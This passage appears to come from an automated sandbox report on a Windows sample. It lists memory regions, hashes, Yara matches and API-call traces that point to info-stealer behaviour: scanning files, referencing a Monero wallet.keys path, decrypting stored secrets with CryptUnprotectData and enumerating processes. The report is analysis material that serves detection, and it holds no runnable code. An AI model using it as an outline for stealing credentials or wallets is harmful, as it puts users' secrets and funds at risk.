                                 • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Similarity
                                • API ID:
                                • String ID: P_}/$T6*$U|$]?o$]?o$*N}$*N}
                                • API String ID: 0-686132001
                                • Opcode ID: a161b71eaa271087c5080759a188793f6127619956ab83f584fd2c2b0b44fcd8
                                • Instruction ID: 57a7767d72bfe1ccdbd868ceeb7de861ba7bad399e07b094759b92a6bec1b2f0
                                • Opcode Fuzzy Hash: a161b71eaa271087c5080759a188793f6127619956ab83f584fd2c2b0b44fcd8
                                • Instruction Fuzzy Hash: 33B229F3A0C2149FE3046F2DEC8567AFBE9EB94720F1A453DEAC4C3744EA7558058692
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: avn$5@/$>y>o$EnkG$^:ww$`hg/$g~
                                • API String ID: 0-2600474645
                                • Opcode ID: 5e79f59cf7cad031b18b81badf9a9f0bc6b92636ea90956f76fcefcaa298400c
                                • Instruction ID: f836da8f82cc548c8181af4dbd4ef80a4bd67c1fb9db778abbd647ac3188a5d1
                                • Opcode Fuzzy Hash: 5e79f59cf7cad031b18b81badf9a9f0bc6b92636ea90956f76fcefcaa298400c
                                • Instruction Fuzzy Hash: 5FB228F360C2049FE300AE29EC8567AFBE5EF94720F1A893DE6C4C7744E53598458697
                                APIs
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                  • Part of subcall function 00B8A920: lstrcpy.KERNEL32(00000000,?), ref: 00B8A972
                                  • Part of subcall function 00B8A920: lstrcat.KERNEL32(00000000), ref: 00B8A982
                                  • Part of subcall function 00B8A9B0: lstrlen.KERNEL32(?,00938A70,?,\Monero\wallet.keys,00B90E17), ref: 00B8A9C5
                                  • Part of subcall function 00B8A9B0: lstrcpy.KERNEL32(00000000), ref: 00B8AA04
                                  • Part of subcall function 00B8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B8AA12
                                  • Part of subcall function 00B8A8A0: lstrcpy.KERNEL32(?,00B90E17), ref: 00B8A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00B90D73), ref: 00B7E4A2
                                • StrCmpCA.SHLWAPI(?,00B914F8), ref: 00B7E4F2
                                • StrCmpCA.SHLWAPI(?,00B914FC), ref: 00B7E508
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00B7EBDF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                • String ID: \*.*
                                • API String ID: 433455689-1173974218
                                • Opcode ID: 52b629ca5fa07546530d5880241a178aebcaafec048cacfd0f9472429ec904ed
                                • Instruction ID: bc66710775ec192775d0e87fb5639c3019397a00ff7c9394a589b2bc53e98de7
                                • Opcode Fuzzy Hash: 52b629ca5fa07546530d5880241a178aebcaafec048cacfd0f9472429ec904ed
                                • Instruction Fuzzy Hash: C11267719101149BEB14FB74DC96EED73B8AF54300F4045EAB51AA21A1EF386F49CFA2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: $Q-7$0Q-7$V5w$![]$s{
                                • API String ID: 0-3527256700
                                • Opcode ID: ca508c54426626bba70b533f13f72ef2c7a410c64e9f2ac484cb2986b2872601
                                • Instruction ID: 1eed59bfe91ed880f813ca56e935b9ba3252fff001f46a69c12b30bdb1eb7c58
                                • Opcode Fuzzy Hash: ca508c54426626bba70b533f13f72ef2c7a410c64e9f2ac484cb2986b2872601
                                • Instruction Fuzzy Hash: F3B2F6F360C204AFE7046E2DEC85B7ABBE9EF94720F16493DE6C4C7744EA3558018696
                                APIs
                                • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00B7C871
                                • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00B7C87C
                                • lstrcat.KERNEL32(?,00B90B46), ref: 00B7C943
                                • lstrcat.KERNEL32(?,00B90B47), ref: 00B7C957
                                • lstrcat.KERNEL32(?,00B90B4E), ref: 00B7C978
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcat$BinaryCryptStringlstrlen
                                • String ID:
                                • API String ID: 189259977-0
                                • Opcode ID: ed1bdf692915836ff6e1ad1eac37be8d367cc839f98ee512eadbd2353ae700de
                                • Instruction ID: ed0311c464d65319cc70d115ec77a647bd5cba195c667dad9e59e8410282e594
                                • Opcode Fuzzy Hash: ed1bdf692915836ff6e1ad1eac37be8d367cc839f98ee512eadbd2353ae700de
                                • Instruction Fuzzy Hash: ED4141B5904219EFDB10DF94DD89BEEB7B8BB48704F1042A8E609A6280D7705A84CFA1
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00B7724D
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00B77254
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00B77281
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00B772A4
                                • LocalFree.KERNEL32(?), ref: 00B772AE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                • String ID:
                                • API String ID: 2609814428-0
                                • Opcode ID: c6151278850baec43f2c2fbf104f38eb07ab4fedb0cb2540a0a6cd6f9e754ade
                                • Instruction ID: c3bf09d02dfdec45ade36450f55eee600ad131b503297494b1e47382ac2f2958
                                • Opcode Fuzzy Hash: c6151278850baec43f2c2fbf104f38eb07ab4fedb0cb2540a0a6cd6f9e754ade
                                • Instruction Fuzzy Hash: AF010075A40308FBEB10DBD8CD49F9D77B8EB44700F108159FB19EA2C0DA70AA008B65
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00B8961E
                                • Process32First.KERNEL32(00B90ACA,00000128), ref: 00B89632
                                • Process32Next.KERNEL32(00B90ACA,00000128), ref: 00B89647
                                • StrCmpCA.SHLWAPI(?,00000000), ref: 00B8965C
                                • CloseHandle.KERNEL32(00B90ACA), ref: 00B8967A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                • String ID:
                                • API String ID: 420147892-0
                                • Opcode ID: 9dfabb9e2864f9f4b4643da527d1f539a730db51116f4a9fdbad9425da190dcd
                                • Instruction ID: 95d4fd6407b957923ffc37ddfbbd10a1a0e17316d2fcd6f989d4806e85865478
                                • Opcode Fuzzy Hash: 9dfabb9e2864f9f4b4643da527d1f539a730db51116f4a9fdbad9425da190dcd
                                • Instruction Fuzzy Hash: AA01E975A00308EBCF14DFA5DD98BEDBBF8EB48700F1442C8A905E6250EB349A40DF61
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: #r}$?C}o$T<[w$]7_
                                • API String ID: 0-1160683953
                                • Opcode ID: 7ed07cd0d8308d7d5272d977bd17abc6e27453a85167c66014f02ce22b9b73b9
                                • Instruction ID: e9dbdfa1c60de0c299cf07724af7b3a030bfcb0a8a282b8587a7b6fa2a502b10
                                • Opcode Fuzzy Hash: 7ed07cd0d8308d7d5272d977bd17abc6e27453a85167c66014f02ce22b9b73b9
                                • Instruction Fuzzy Hash: B3B239F3A0C2049FE3046E2DEC8567AFBE9EF94320F1A493DEAC4D7744E67558048696
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: J*lO$Wz?o$jF7$=
                                • API String ID: 0-3442474099
                                • Opcode ID: b6f1c08e6760db4411b5aca2455213f98086f4550937b4b9b55afaffbaba0227
                                • Instruction ID: fe8809cdbf362313f0a86f048b8b2c366e964c62a67da8c0a6d911e7766e5aa2
                                • Opcode Fuzzy Hash: b6f1c08e6760db4411b5aca2455213f98086f4550937b4b9b55afaffbaba0227
                                • Instruction Fuzzy Hash: E1A2E5B360C2149FE314AE2DEC8567AFBE9EF94720F16853DEAC4C3744EA3558018697
                                APIs
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00B905B7), ref: 00B886CA
                                • Process32First.KERNEL32(?,00000128), ref: 00B886DE
                                • Process32Next.KERNEL32(?,00000128), ref: 00B886F3
                                  • Part of subcall function 00B8A9B0: lstrlen.KERNEL32(?,00938A70,?,\Monero\wallet.keys,00B90E17), ref: 00B8A9C5
                                  • Part of subcall function 00B8A9B0: lstrcpy.KERNEL32(00000000), ref: 00B8AA04
                                  • Part of subcall function 00B8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B8AA12
                                  • Part of subcall function 00B8A8A0: lstrcpy.KERNEL32(?,00B90E17), ref: 00B8A905
                                • CloseHandle.KERNEL32(?), ref: 00B88761
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                • String ID:
                                • API String ID: 1066202413-0
                                • Opcode ID: 51c2164cb463a07efd708146616ff9fc0671b09c2bd8ac51c73a4cb447c7f728
                                • Instruction ID: b77800f553e4bcf936dd7f2ce9e85d84794bfa61d4f6272837a8bddbf1efd29e
                                • Opcode Fuzzy Hash: 51c2164cb463a07efd708146616ff9fc0671b09c2bd8ac51c73a4cb447c7f728
                                • Instruction Fuzzy Hash: 44313C71901218EBDB24EB54DC45FEEB7B8EB45700F5042EAE10AA21B0DF346E45CFA1
                                APIs
                                • CryptBinaryToStringA.CRYPT32(00000000,00B75184,40000001,00000000,00000000,?,00B75184), ref: 00B88EC0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptString
                                • String ID:
                                • API String ID: 80407269-0
                                • Opcode ID: 672db95b7b87835ab36b1e33e52a76ba4bb0747b5718fdd9231b2c0d7fd5c0e8
                                • Instruction ID: acedd55a963548b777af23dc34d1b83d89ba343109e36515648211215ae636b1
                                • Opcode Fuzzy Hash: 672db95b7b87835ab36b1e33e52a76ba4bb0747b5718fdd9231b2c0d7fd5c0e8
                                • Instruction Fuzzy Hash: 79110674200209EFDB00DF68D884FAA33E9EF89301F509988FA198B260DB35E841DB60
                                APIs
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00B74EEE,00000000,00000000), ref: 00B79AEF
                                • LocalAlloc.KERNEL32(00000040,?,?,?,00B74EEE,00000000,?), ref: 00B79B01
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00B74EEE,00000000,00000000), ref: 00B79B2A
                                • LocalFree.KERNEL32(?,?,?,?,00B74EEE,00000000,?), ref: 00B79B3F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptLocalString$AllocFree
                                • String ID:
                                • API String ID: 4291131564-0
                                • Opcode ID: cb5d4385cf85a6e3f401bb8a89ae3bc1a52a880eaa1e4afebad3855c43aba932
                                • Instruction ID: 5645609ce1d707410575176cf6346ceea5abbcd2d21ec716f1ccd96a0b4d2161
                                • Opcode Fuzzy Hash: cb5d4385cf85a6e3f401bb8a89ae3bc1a52a880eaa1e4afebad3855c43aba932
                                • Instruction Fuzzy Hash: 2111A4B4240308EFEB10CF64DC95FAA77B5FB89700F208158F9199B390C775A901CB60
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00B90E00,00000000,?), ref: 00B879B0
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00B879B7
                                • GetLocalTime.KERNEL32(?,?,?,?,?,00B90E00,00000000,?), ref: 00B879C4
                                • wsprintfA.USER32 ref: 00B879F3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateLocalProcessTimewsprintf
                                • String ID:
                                • API String ID: 377395780-0
                                • Opcode ID: 8dee41da7cf4994a9bbabc158567c707fa2292251216b2a45328953576cd379b
                                • Instruction ID: 728e71a7eff5daf3df34757add4b6cf05926d3ea83e8e5d374b1556dc544b101
                                • Opcode Fuzzy Hash: 8dee41da7cf4994a9bbabc158567c707fa2292251216b2a45328953576cd379b
                                • Instruction Fuzzy Hash: D11115B2904218EACB149FC9DD45BBEB7F8EB48B11F10425AF605A2290E6395940CBB1
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0093DB90,00000000,?,00B90E10,00000000,?,00000000,00000000), ref: 00B87A63
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00B87A6A
                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0093DB90,00000000,?,00B90E10,00000000,?,00000000,00000000,?), ref: 00B87A7D
                                • wsprintfA.USER32 ref: 00B87AB7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                • String ID:
                                • API String ID: 3317088062-0
                                • Opcode ID: d8386349bfe905f898a7b790fc00351fc740c98cd8c46741e24b2f741b4c475e
                                • Instruction ID: 53e5edd5ed7f931a844149596d46ae9895f400850650be71083904cd1becc389
                                • Opcode Fuzzy Hash: d8386349bfe905f898a7b790fc00351fc740c98cd8c46741e24b2f741b4c475e
                                • Instruction Fuzzy Hash: A91182B1945218EBDB149B58DC45F69B7B8FB04711F1043D6E51A932D0D7745E40CF51
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: |o[$U=/!$z>k
                                • API String ID: 0-1134408890
                                • Opcode ID: 808a85fd5ff8e27d2e441a32064143699c068a5843166a473c4f1b033c65a407
                                • Instruction ID: 6bfaaceee9b1542c8afeac7f658d4736c983393180c0b4f74e87d50ff7441e5a
                                • Opcode Fuzzy Hash: 808a85fd5ff8e27d2e441a32064143699c068a5843166a473c4f1b033c65a407
                                • Instruction Fuzzy Hash: 9BB2F5F390C2049FE304AE2DEC8577ABBE5EF94720F1A493DEAC483744EA3558158697
                                APIs
                                • CoCreateInstance.COMBASE(00B8E118,00000000,00000001,00B8E108,00000000), ref: 00B83758
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00B837B0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharCreateInstanceMultiWide
                                • String ID:
                                • API String ID: 123533781-0
                                • Opcode ID: d396ba7f976e0cce98977827bc0e7ed8f1ae44e38c9527b261f013530238a855
                                • Instruction ID: c91ede6a941e83257807ec2e5d0e75dfc9b22cde2513db24aec32a8b673ef6eb
                                • Opcode Fuzzy Hash: d396ba7f976e0cce98977827bc0e7ed8f1ae44e38c9527b261f013530238a855
                                • Instruction Fuzzy Hash: 0841EA70A40A289FDB24DB58CC95B9BB7B5BB48702F4041D8E618E72E0D771AE85CF50
                                APIs
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00B79B84
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 00B79BA3
                                • LocalFree.KERNEL32(?), ref: 00B79BD3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$AllocCryptDataFreeUnprotect
                                • String ID:
                                • API String ID: 2068576380-0
                                • Opcode ID: 994ff98c1fbf3761ef8da4fae0c8cadf8b1b9024571e69e2d9485089aaee07c5
                                • Instruction ID: bc1eb2edd6fdc3f81e54d0da289d2d294a477312fdfa78710c6e909bdb5c8b6a
                                • Opcode Fuzzy Hash: 994ff98c1fbf3761ef8da4fae0c8cadf8b1b9024571e69e2d9485089aaee07c5
                                • Instruction Fuzzy Hash: A711BAB8A00209EFDB04DF98D985AAE77F5FF89300F108598E91597390D774AE10CF61
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: e}$x$
                                • API String ID: 0-3067363150
                                • Opcode ID: 659ace4e1e4f3074fa9a5412fa2ec0c64cd1bce1769e04aba0a9b6b612bde9a6
                                • Instruction ID: 6ccb5f0c0f849a2a88cac81e9f3d886f9f546198a76c09afa4aaeb195e9ccc75
                                • Opcode Fuzzy Hash: 659ace4e1e4f3074fa9a5412fa2ec0c64cd1bce1769e04aba0a9b6b612bde9a6
                                • Instruction Fuzzy Hash: 6BB204F39082049FE304AF2DEC8566ABBE5EB94720F1A493DEAC5D3744EA3558058787
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: vBF$"<}
                                • API String ID: 0-2469788779
                                • Opcode ID: b41bd8c9cbfa4a865ce1b9e572323df7e8900cf8d5d32c025bbc80f3806591b8
                                • Instruction ID: 32ad2075b023b8a666f973b57d3ca30ad7b880180ca263f0719cab2d1bb5ce89
                                • Opcode Fuzzy Hash: b41bd8c9cbfa4a865ce1b9e572323df7e8900cf8d5d32c025bbc80f3806591b8
                                • Instruction Fuzzy Hash: 2EB2E3F390C200AFE314AE29EC8567ABBE5EF94720F16893DEAC4C7344E63558158797
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: *{
                                • API String ID: 0-308834529
                                • Opcode ID: 247080b3fff9f22f93ac6251cf3c5d95edfc1022ebffe9d6e448eb5b843a2017
                                • Instruction ID: fce724691046927cf599252396c83dc8046b3f61b33f0c862bbd6c01a9e5ebf0
                                • Opcode Fuzzy Hash: 247080b3fff9f22f93ac6251cf3c5d95edfc1022ebffe9d6e448eb5b843a2017
                                • Instruction Fuzzy Hash: B9B249F3A0C6049FE3046E2DEC8577ABBE9EF94720F164A3DEAC4C3744E93558058696
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: !Y2_$JFkB
                                • API String ID: 0-1374303941
                                • Opcode ID: fcbc4810f48796017bd0dc1d041e356535b379086b779d9b1a71a46c098d9d9c
                                • Instruction ID: b80f28edca11bfd0a1aa929ed97bf72ec54789d500b2a9ec6d099105fcf6bce9
                                • Opcode Fuzzy Hash: fcbc4810f48796017bd0dc1d041e356535b379086b779d9b1a71a46c098d9d9c
                                • Instruction Fuzzy Hash: C15157B3E042189BE3109D2ADC8476AB697EBD4721F2BC63CDDC857B48ED795C058282
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: iIg
                                • API String ID: 0-2654269806
                                • Opcode ID: 340717925fce2f10418f7e9807f5e358a42a62a9436565eaaef6a533d4a0455c
                                • Instruction ID: c46f260c4313990dcab450624291f8ad35487949454a8ba54f998f28c14a9581
                                • Opcode Fuzzy Hash: 340717925fce2f10418f7e9807f5e358a42a62a9436565eaaef6a533d4a0455c
                                • Instruction Fuzzy Hash: AB412AF3A182149BE3109E3EDC85767BBD6DBC4330F2B463DD988D7B84D53999068292
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 2O|
                                • API String ID: 0-1779813692
                                • Opcode ID: c2ca7ab94b7ca8c63032a9e6c8cc7a3783245fad8a27454cb31985543e2ae72e
